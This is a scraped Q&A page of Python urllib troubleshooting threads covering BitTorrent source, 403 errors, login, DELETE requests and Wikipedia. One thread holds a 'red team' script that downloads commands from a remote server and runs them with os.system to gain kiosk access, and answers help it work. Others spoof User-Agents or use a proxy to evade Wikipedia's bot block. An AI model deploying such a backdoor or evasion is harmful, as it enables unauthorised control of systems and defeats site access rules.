I found an old source of Bram Cohen's original BitTorrent here:
http://bittorrent.cvs.sourceforge.net/viewvc/bittorrent/?hideattic=0
(says here: Where to find BitTorrent source code? that it's version 3.x)
and I'm trying to run it on my Mac (10.7) and my Python version is 2.7
If you would try and download the source, you can try running the btdownloadcurses.py or the btdownloadheadless.py
I tried running:
$ ./btdownloadcurses.py --url http://sometorrenthost/somefile.torrent
Ok, I'll be more specific. This is what I did:
$ ./btdownloadcurses.py --url http://torcache.net/torrent/848A6A0EC6C85507B8370E979B133214E5B5A6D4.torrent
And this is what I got:
Traceback (most recent call last):
File "./btdownloadcurses.py", line 243, in <module>
run(mainerrlist, argv[1:])
File "./btdownloadcurses.py", line 186, in run
download(params, d.chooseFile, d.display, d.finished, d.error, mainkillflag, fieldw)
File "/Users/joal21/Desktop/BitTorrent/BitTorrent/download.py", line 120, in download
h = urlopen(config['url'])
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 127, in urlopen
return _opener.open(url, data, timeout)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 410, in open
response = meth(req, response)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 517, in http_response
code, msg, hdrs = response.code, response.msg, response.info()
AttributeError: addinfourldecompress instance has no attribute 'msg'
When I searched for that AttributeError, I came to:
http://mail.python.org/pipermail/python-bugs-list/2005-May/028824.html
I think the second comment has something to do with my problem. But I don't know how else to procees from there. Am I simply just passing the wrong url? Does it have something to do with the Python version? Or of the BitTorrent source being old. Or is there something new in present .torrent files. What am I missing? Not doing?
Forgive my ignorance. I'm really at a loss here.
Bram worked against an older version of Python, one where the urllib2 code did not add .msg and .code attributes to addinfourl objects. Specifically, the Python version he developed with did not have this change applied.
The workaround is to copy those attributes yourself from the original addinfourl object in the HTTPContentEncodingHandler class found in the original zurllib.py file:
class HTTPContentEncodingHandler(HTTPHandler):
"""Inherit and add gzip/deflate/etc support to HTTP gets."""
def http_open(self, req):
# add the Accept-Encoding header to the request
# support gzip encoding (identity is assumed)
req.add_header("Accept-Encoding","gzip")
req.add_header('User-Agent', 'BitTorrent/' + version)
if DEBUG:
print "Sending:"
print req.headers
print "\n"
fp = HTTPHandler.http_open(self,req)
headers = fp.headers
if DEBUG:
pprint.pprint(headers.dict)
url = fp.url
resp = addinfourldecompress(fp, headers, url)
resp.code = fp.code
resp.msg = fp.msg
return resp
Related
I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x
As soon as i run it i get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
print("####")
os.system(line)
Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!
The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
Try
“http://localhost/domain.com/test.txt"
Or remote address
If local host need to run http server
The problem begins with this link
https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip
the file downloaded with the downloader is complete.
enter image description here
and I try to use python to download the file
from urllib import request
import sys
request.urlretrieve('https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip', '123.zip')
Traceback (most recent call last):
File "C:/Users/ssshooter/PycharmProjects/first/111.py", line 3, in <module>
request.urlretrieve('https://i1.pixiv.net/img-zip-ugoira/img/2017/04/05/00/24/41/62259492_ugoira600x600.zip', '123.zip')
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 248, in urlretrieve
with contextlib.closing(urlopen(url, data)) as fp:
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 223, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 532, in open
response = meth(req, response)
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 642, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 570, in error
return self._call_chain(*args)
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 504, in _call_chain
result = func(*args)
File "C:\Users\ssshooter\AppData\Local\Programs\Python\Python36\lib\urllib\request.py", line 650, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 403: Forbidden
It doesn't work.
The differences are:
You're using different SSL information: You're browser has a built-in set of certificate authorities. Python uses a set which comes with the OS. They differ & if the site you're accessing uses one know to your browser but not known to python, the python will throw an exception.
You're accessing using different User-Agents. Your browser is telling the server it's Chrome or IE or whatever. Python is telling the server it's python. For whatever reason, the server may decide it doesn't like that and return Forbidden.
The server may be working harder than you think: while it appears the request is for a simple file, you're really requesting a resource. It may be (though unlikely in this case) that the resource you're requesting results in multiple interactions between the server and your browser -- cookies, javascript, etc -- which are executed successfully in your browser, returned to the server & it then delivers the file. Your python request is not doing any of that.
Your browser (may) have existing state which your python does not. You say you can access the file using your browser, but it could be that works only because you've accessed other resources on the site, or logged in, or whatever. Your browser is communicating that information (perhaps a session_id via cookie?) with the server recognizes. Your python code states with no previous state, so the server forbids that.
Which is it in this case? You'll need to investigate. Can you get wget or curl to work? Debug your browser's access: what headers are being sent, what are you receiving in reply?
I had learned a lot of things from MOOCs so I wanted to return something back to them for this purpose I was thinking of designing a small app in kivy which thus requires python implementation, Actually the thing I wanted to achieve was to log in to my Coursera account via program and collect the information about the courses I am currently pursuing, for this first I have to log in to the coursera( https://accounts.coursera.org/signin?post_redirect=https%3A%2F%2Fwww.coursera.org%2F ), Upon searching the Web I came across this piece of code :
import urllib2, cookielib, urllib
username = "abcdef#abcdef.com"
password = "uvwxyz"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username, 'password' : password})
info = opener.open("https://accounts.coursera.org/signin",login_data)
for line in info:
print line
and some similar codes as well, but none worked for me, every approach lead to me this type of error:
Traceback (most recent call last):
File "C:\Python27\Practice\web programming\coursera login.py", line 9, in <module>
info = opener.open("https://accounts.coursera.org/signin",login_data)
File "C:\Python27\lib\urllib2.py", line 410, in open
response = meth(req, response)
File "C:\Python27\lib\urllib2.py", line 523, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Python27\lib\urllib2.py", line 448, in error
return self._call_chain(*args)
File "C:\Python27\lib\urllib2.py", line 382, in _call_chain
result = func(*args)
File "C:\Python27\lib\urllib2.py", line 531, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
Is the error due to https protocol or there is something that I am missing?
I don't want to use any 3rd party libraries.
I'm using requests for this purpose and I think it is a great python library. Here is some example code how it could work:
import requests
from requests.auth import HTTPBasicAuth
credentials = HTTPBasicAuth('username', 'password')
response = requests.get("https://accounts.coursera.org/signin", auth=credentials)
print response.status_code
# if everything was fine then it prints
>>> 200
Here is the link to requests:
http://docs.python-requests.org/en/latest/
I think you need to use HTTPBasicAuthHandler module of urllib2. Check section 'Basic Authentication'. https://docs.python.org/2/howto/urllib2.html
And I strongly recommend you requests module. It will make your code better. http://docs.python-requests.org/en/latest/
I am trying to use the python-rest-client ( http://code.google.com/p/python-rest-client/wiki/Using_Connection ) to perform testing of some RESTful webservices. Since I'm just learning, I've been pointing my tests at the sample services provided at http://www.predic8.com/rest-demo.htm.
I have no problems with creating entries, updating entries, or retrieving entries (POST and GET requests). When I try make a DELETE request, it fails. I can use the Firefox REST Client to perform DELETE requests and they work. I can also make DELETE requests on other services, but I've been driving myself crazy trying to figure out why it doesn't work in this case. I'm using Python 3 with updated Httplib2, but I also tried Python 2.5 so that I could use the python-rest-client with the included version of Httplib2. I see the same problem in either case.
The code is simple, matching the documented use:
from restful_lib import Connection
self.base_url = "http://www.thomas-bayer.com"
self.conn = Connection(self.base_url)
response = self.conn.request_delete('/sqlrest/CUSTOMER/85')
I've looked at the resulting HTTP requests from the browser tool and from my code and I can't see why one works and the other doesn't. This is the trace I receive:
Traceback (most recent call last):
File "/home/fmk/python/rest-client/src/TestExampleService.py", line 68, in test_CRUD
self.Delete()
File "/home/fmk/python/rest-client/src/TestExampleService.py", line 55, in Delete
response = self.conn.request_delete('/sqlrest/CUSTOMER/85')
File "/home/fmk/python/rest-client/src/restful_lib.py", line 64, in request_delete
return self.request(resource, "delete", args, headers=headers)
File "/home/fmk/python/rest-client/src/restful_lib.py", line 138, in request
resp, content = self.h.request("%s://%s%s" % (self.scheme, self.host, '/'.join(request_path)), method.upper(), body=body, headers=headers )
File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 1175, in request
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 931, in _request
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 897, in _conn_request
response = conn.getresponse()
File "/usr/lib/python3.2/http/client.py", line 1046, in getresponse
response.begin()
File "/usr/lib/python3.2/http/client.py", line 346, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.2/http/client.py", line 316, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine: ''
What's breaking? What do I do about it? Actually, I'd settle for advice on debugging it. I've changed the domain in my script and pointed it at my own machine so I could view the request. I've viewed/modified the Firefox requests in BurpProxy to make them match my script requests. The modified Burp requests still work and the Python requests still don't.
Apparently the issue is that the server expects there to be some message body for DELETE requests. That's an unusual expectation for a DELETE, but by specifying Content-Length:0 in the headers, I'm able to successfully perform DELETEs.
Somewhere along the way (in python-rest-client or httplib2), the Content-Length header is wiped out if I try to do:
from restful_lib import Connection
self.base_url = "http://www.thomas-bayer.com"
self.conn = Connection(self.base_url)
response = self.conn.request_delete('/sqlrest/CUSTOMER/85', headers={'Content-Length':'0'})
Just to prove the concept, I went to the point in the stack trace where the request was happening:
File "/home/fmk/python/rest-client/src/httplib2/__init__.py", line 897, in _conn_request
response = conn.getresponse()
I printed the headers parameter there to confirm that the content length wasn't there, then I added:
if(method == 'DELETE'):
headers['Content-Length'] = '0'
before the request.
I think the real answer is that the service is wonky, but at least I got to know httplib2 a little better. I've seen some other confused people looking for help with REST and Python, so hopefully I'm not the only one who got something out of this.
The following script correctly produces 404 response from the server:
#!/usr/bin/env python3
import http.client
h = http.client.HTTPConnection('www.thomas-bayer.com', timeout=10)
h.request('DELETE', '/sqlrest/CUSTOMER/85', headers={'Content-Length': 0})
response = h.getresponse()
print(response.status, response.version)
print(response.info())
print(response.read()[:77])
python -V => 3.2
curl -X DELETE http://www.thomas-bayer.com/sqlrest/CUSTOMER/85
curl: (52) Empty reply from server
Status-Line is not optional; HTTP server must return it. Or at least send 411 Length Required response.
curl -H 'Content-length: 0' -X DELETE \
http://www.thomas-bayer.com/sqlrest/CUSTOMER/85
Returns correctly 404.
I have a strange bug when trying to urlopen a certain page from Wikipedia. This is the page:
http://en.wikipedia.org/wiki/OpenCola_(drink)
This is the shell session:
>>> f = urllib2.urlopen('http://en.wikipedia.org/wiki/OpenCola_(drink)')
Traceback (most recent call last):
File "C:\Program Files\Wing IDE 4.0\src\debug\tserver\_sandbox.py", line 1, in <module>
# Used internally for debug sandbox under external interpreter
File "c:\Python26\Lib\urllib2.py", line 126, in urlopen
return _opener.open(url, data, timeout)
File "c:\Python26\Lib\urllib2.py", line 397, in open
response = meth(req, response)
File "c:\Python26\Lib\urllib2.py", line 510, in http_response
'http', request, response, code, msg, hdrs)
File "c:\Python26\Lib\urllib2.py", line 435, in error
return self._call_chain(*args)
File "c:\Python26\Lib\urllib2.py", line 369, in _call_chain
result = func(*args)
File "c:\Python26\Lib\urllib2.py", line 518, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 403: Forbidden
This happened to me on two different systems in different continents. Does anyone have an idea why this happens?
Wikipedias stance is:
Data retrieval: Bots may not be used
to retrieve bulk content for any use
not directly related to an approved
bot task. This includes dynamically
loading pages from another website,
which may result in the website being
blacklisted and permanently denied
access. If you would like to download
bulk content or mirror a project,
please do so by downloading or hosting
your own copy of our database.
That is why Python is blocked. You're supposed to download data dumps.
Anyways, you can read pages like this in Python 2:
req = urllib2.Request(url, headers={'User-Agent' : "Magic Browser"})
con = urllib2.urlopen( req )
print con.read()
Or in Python 3:
import urllib
req = urllib.request.Request(url, headers={'User-Agent' : "Magic Browser"})
con = urllib.request.urlopen( req )
print(con.read())
To debug this, you'll need to trap that exception.
try:
f = urllib2.urlopen('http://en.wikipedia.org/wiki/OpenCola_(drink)')
except urllib2.HTTPError, e:
print e.fp.read()
When I print the resulting message, it includes the following
"English
Our servers are currently experiencing
a technical problem. This is probably
temporary and should be fixed soon.
Please try again in a few minutes. "
Often times websites will filter access by checking if they are being accessed by a recognised user agent. Wikipedia is just treating your script as a bot and rejecting it. Try spoofing as a browser. The following link takes to you an article to show you how.
http://wolfprojects.altervista.org/changeua.php
Some websites will block access from scripts to avoid 'unnecessary' usage of their servers by reading the headers urllib sends. I don't know and can't imagine why wikipedia does/would do this, but have you tried spoofing your headers?
As Jochen Ritzel mentioned, Wikipedia blocks bots.
However, bots will not get blocked if they use the PHP api.
To get the Wikipedia page titled "love":
http://en.wikipedia.org/w/api.php?format=json&action=query&titles=love&prop=revisions&rvprop=content
I made a workaround for this using php which is not blocked by the site I needed.
it can be accessed like this:
path='http://phillippowers.com/redirects/get.php?
file=http://website_you_need_to_load.com'
req = urllib2.Request(path)
response = urllib2.urlopen(req)
vdata = response.read()
This will return the html code to you